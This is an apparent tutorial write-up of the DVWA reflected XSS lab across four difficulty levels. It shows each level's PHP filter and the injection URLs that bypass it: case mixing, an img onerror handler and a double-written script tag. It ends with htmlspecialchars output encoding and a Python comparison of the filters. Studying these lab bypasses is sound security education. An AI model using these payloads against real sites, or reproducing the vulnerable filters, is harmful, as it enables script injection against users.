Reflected Cross Site Scripting (XSS)

Preface

Reflected Cross Site Scripting (XSS). The attacker crafts the attack link in advance and has to trick a user into clicking it for the injected code to run; nothing is stored on the server, the payload is simply reflected back from the request. It most often turns up on pages such as search pages that echo user input.

The following four levels of the DVWA reflected XSS exercise are analyzed:

  • Low

Server Core Code:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Feedback for end user
	$html .= '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?>

You can see that the server only checks whether the name parameter exists and is non-empty, then writes its value straight into a pre tag without any encoding.


Exploitation

Since there is no protection at all, the payload can be injected directly:

http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=<script>alert('You are attacked!')</script>

The injected statement is executed by the browser as a script.

  • Medium

Server Core Code:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Get input
	$name = str_replace( '<script>', '', $_GET[ 'name' ] );

	// Feedback for end user
	$html .= "<pre>Hello ${name}</pre>";
}

?>

The Medium-level server removes the exact string <script>, but the check is case-sensitive, so mixed-case tags pass straight through (a case-insensitive regular expression would at least catch that).

Exploitation

There are three ways to bypass this filter:

  • Method 1: Case Bypass

One thing to understand here is:

  • HTML tag names are case-insensitive
  • JavaScript is case-sensitive

So the injection statement is:

http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=<Script>alert('You are attacked!')</scRipt>

  • Method 2: Error Event img tag bypass

A standard alternative: an img tag whose onerror event handler runs the code, so no script tag is needed at all.

http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=<img src="" onerror="alert('You are attacked!')">

  • Method 3: Double Write Bypass

Since the server calls str_replace() only once and never re-scans the result, removing <script> from a nested string leaves a fresh <script> behind, so it can be bypassed by double writing:

http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=<s<script>cript>alert('You are attacked!')</script>

  • High

Server Core Code:

<?php

header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Get input
	$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );

	// Feedback for end user
	$html .= "<pre>Hello ${name}</pre>";
}

?>

As you can see, the server now uses a case-insensitive regular expression to strip anything that looks like a script tag. It seems that the server has a special love for script tags.

Exploitation

Although script tags are filtered, other tags can still be injected, for example method two from the Medium level:

http://localhost/DVWA/vulnerabilities/xss_r/index.php?name=<img src="" onerror="alert('You are attacked!')">

  • Impossible

Server Core Code:

<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$name = htmlspecialchars( $_GET[ 'name' ] );

	// Feedback for end user
	$html .= "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?>

  • htmlspecialchars() function

Converts some predefined characters to HTML entities.

The predefined characters are:

& (ampersand) becomes &amp;

" (double quote) becomes &quot;

' (single quote) becomes &#039;

< (less than) becomes &lt;

> (greater than) becomes &gt;

Use the htmlspecialchars function to convert the predefined characters &, ", ', < and > into HTML entities, so that the browser does not interpret them as HTML markup.
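To compare the four server-side treatments side by side, the following Python re-implements the Low, Medium, High and Impossible filters from the code above and runs the four payloads from this walkthrough through each of them. It is an added example, not DVWA's own code; the filter functions mirror the PHP calls shown in each level, and the "does an opening tag survive" check is a simplification used here only for illustration.

```python
import html
import re

# Python re-implementations of the four treatments of $_GET['name'] above.

def low(name: str) -> str:
    return name                                   # no filtering at all

def medium(name: str) -> str:
    # str_replace('<script>', '', ...): exact, case-sensitive, single pass
    return name.replace("<script>", "")

def high(name: str) -> str:
    # preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', ...)
    return re.sub(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", "", name, flags=re.I)

def impossible(name: str) -> str:
    # htmlspecialchars(): output encoding instead of a blacklist. Python's
    # html.escape(quote=True) also encodes the single quote (as &#x27;
    # rather than PHP's &#039;); in PHP that needs the ENT_QUOTES flag,
    # which only became the default in PHP 8.1.
    return html.escape(name, quote=True)

def render(filter_fn, name: str) -> str:
    """The page's template: the (filtered) value inside a <pre> tag."""
    return f"<pre>Hello {filter_fn(name)}</pre>"

def opens_tag(filtered: str) -> bool:
    # A browser starts a new element when '<' is followed by a letter;
    # a leftover '</script>' or a bare '>' creates no element.
    return re.search(r"<[A-Za-z]", filtered) is not None

def survives(filter_fn, payload: str) -> bool:
    """True if an opening tag is still present after filtering."""
    return opens_tag(filter_fn(payload))

# The four payloads used in the walkthrough above.
PAYLOADS = {
    "plain":       "<script>alert('You are attacked!')</script>",
    "mixed_case":  "<Script>alert('You are attacked!')</scRipt>",
    "img_onerror": '<img src="" onerror="alert(\'You are attacked!\')">',
    "double":      "<s<script>cript>alert('You are attacked!')</script>",
}

def matrix() -> dict:
    """Which level lets which payload through: {level: {payload: bool}}."""
    return {f.__name__: {k: survives(f, p) for k, p in PAYLOADS.items()}
            for f in (low, medium, high, impossible)}

if __name__ == "__main__":
    for level, row in matrix().items():
        print(f"{level:11}", {k: "bypassed" if v else "blocked" for k, v in row.items()})
```

Only the Impossible level blocks every payload, because it encodes the output instead of trying to recognise bad input; each blacklist level is defeated by at least one of the page's payloads.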

Tags: PHP

Posted on Sun, 09 Feb 2020 22:44:55 -0500 by dfego